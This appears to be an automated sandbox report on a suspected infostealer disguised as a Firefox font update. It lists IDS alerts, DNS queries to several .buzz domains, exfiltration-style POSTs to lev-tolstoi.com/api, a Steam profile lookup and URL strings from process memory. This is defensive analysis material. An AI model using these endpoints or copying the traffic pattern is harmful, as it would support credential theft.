                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49716 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49709 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49710 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 172.67.157.254:443
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 86Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=M7Y72E3D69IRAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12812Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=J3FFDY4GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15024Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=3A6GNRTMT0ED2APJYU3User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20580Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=0GFWAZ436VZL5S3QE3User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1278Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=LNSWTUQTFNJU1FQSUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1121Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 121Host: lev-tolstoi.com
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: om/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.b;hh equals www.youtube.com (Youtube)
                Source: aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: om/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://playl=hi equals www.youtube.com (Youtube)
                Source: aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-sr equals www.youtube.com (Youtube)
                Source: global trafficDNS traffic detected: DNS query: ingreem-eilish.biz
                Source: global trafficDNS traffic detected: DNS query: prisonyfork.buzz
                Source: global trafficDNS traffic detected: DNS query: rebuildeso.buzz
                Source: global trafficDNS traffic detected: DNS query: scentniej.buzz
                Source: global trafficDNS traffic detected: DNS query: inherineau.buzz
                Source: global trafficDNS traffic detected: DNS query: screwamusresz.buzz
                Source: global trafficDNS traffic detected: DNS query: appliacnesot.buzz
                Source: global trafficDNS traffic detected: DNS query: cashfuzysao.buzz
                Source: global trafficDNS traffic detected: DNS query: hummskitnj.buzz
                Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                Source: global trafficDNS traffic detected: DNS query: lev-tolstoi.com
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
                Source: aspnet_regiis.exe, 00000003.00000003.2150765149.0000000005CA3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: aspnet_regiis.exe, 00000003.00000003.2150765149.0000000005CA3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: aspnet_regiis.exe, 00000003.00000003.2150765149.0000000005CA3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: aspnet_regiis.exe, 00000003.00000003.2150765149.0000000005CA3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: aspnet_regiis.exe, 00000003.00000003.2150765149.0000000005CA3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: aspnet_regiis.exe, 00000003.00000003.2150765149.0000000005CA3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: aspnet_regiis.exe, 00000003.00000003.2150765149.0000000005CA3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: aspnet_regiis.exe, 00000003.00000003.2150765149.0000000005CA3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: aspnet_regiis.exe, 00000003.00000003.2150765149.0000000005CA3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: aspnet_regiis.exe, 00000003.00000003.2220410400.00000000035C5000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2243324793.00000000035CF000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2176957876.00000000035BE000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2242472000.00000000035CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowere
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220835509.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103475750.00000000035D6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2176809705.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220561655.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.000000000352A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2176957876.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2243258087.00000000035AF000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2242513576.00000000035AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220835509.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103475750.00000000035D6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2176809705.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220561655.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.000000000352A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2176957876.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2243258087.00000000035AF000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2242513576.00000000035AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220835509.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103475750.00000000035D6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2176809705.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220561655.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.000000000352A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2176957876.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2243258087.00000000035AF000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2242513576.00000000035AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
                Source: aspnet_regiis.exe, 00000003.00000003.2150765149.0000000005CA3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: aspnet_regiis.exe, 00000003.00000003.2150765149.0000000005CA3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: aspnet_regiis.exe, 00000003.00000003.2104310950.0000000005C39000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2104363080.0000000005C36000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2104426374.0000000005C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                Source: aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.000000000352A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                Source: aspnet_regiis.exe, 00000003.00000003.2104310950.0000000005C39000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2104363080.0000000005C36000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2104426374.0000000005C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.
                Source: aspnet_regiis.exe, 00000003.00000003.2104310950.0000000005C39000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2104363080.0000000005C36000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2104426374.0000000005C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: aspnet_regiis.exe, 00000003.00000003.2104310950.0000000005C39000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2104363080.0000000005C36000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2104426374.0000000005C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampow
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fast
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220835509.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2176809705.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220561655.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2176957876.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.st
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.ste
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steam
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamst
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamsta
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.co
                Source: aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/publ
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.000000000352A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profiw
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.000000000352A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220835509.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103475750.00000000035D6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2176809705.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2220561655.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.000000000352A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2176957876.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2243258087.00000000035AF000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2242513576.00000000035AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.000000000352A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.000000000352A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
                Source: aspnet_regiis.exe, 00000003.00000003.2103505793.0000000003577000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081432789.000000000352A000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2103663864.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRi
                Source: aspnet_regiis.exe, 00000003.00000003.2081432789.0000000003576000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/glob
                Source: aspnet_regiis.exe, 00000003.00000003.2081418201.00000000035CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2081382958.00000000035CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
